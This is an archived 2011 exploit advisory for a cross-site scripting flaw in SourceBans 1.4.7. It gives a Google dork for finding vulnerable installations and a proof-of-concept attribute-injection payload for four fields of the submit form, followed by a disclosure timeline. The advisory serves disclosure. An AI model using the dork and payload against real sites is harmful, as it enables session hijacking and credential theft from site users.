Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25645
HistoryFeb 11, 2011 - 12:00 a.m.

SourceBans Version 1.4.7 XSS

2011-02-1100:00:00
vulners.com
48

Exploit Title: SourceBans Version 1.4.7 XSS

Google Dork: inurl:"sourcebans/index.php?p=submit"

Date: Feb. 9th 2011

Author: Sw1tCh

Software Link: http://www.sourcebans.net/

Version: 1.4.7

Info:
SourceBans is an application for managing publicly the banned users for a Steam Server.

#-= The Advisory =-
SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access
controls and or a credentials loss.

#-= Example =-

http://<SITE>/sourcebans/index.php?p=submit

    - &gt; BanIP =&gt;  &quot; onmouseover=prompt&#40;928137&#41; bad=&quot;
    - &gt; Comments =&gt;  &quot; onmouseover=prompt&#40;928137&#41; bad=&quot;
    - &gt; Name =&gt; &quot; onmouseover=prompt&#40;928137&#41; bad=&quot;
    - &gt; Email =&gt;  &quot; onmouseover=prompt&#40;928137&#41; bad=&quot;

#Disclosure Information:

  • Vulnerability found and researched: January 18th 2011
  • Vendor (SourceBans) contacted: January 18th 2011
    [ Time Reduced because Ops of IRC channel were dicks ]
  • Disclosed to Exploit-DB, Bugtraq and InterN0T:

#Credits: Sw1tCh

#Shoutouts : gen0cide, Scruffy, Griff, D00dl3,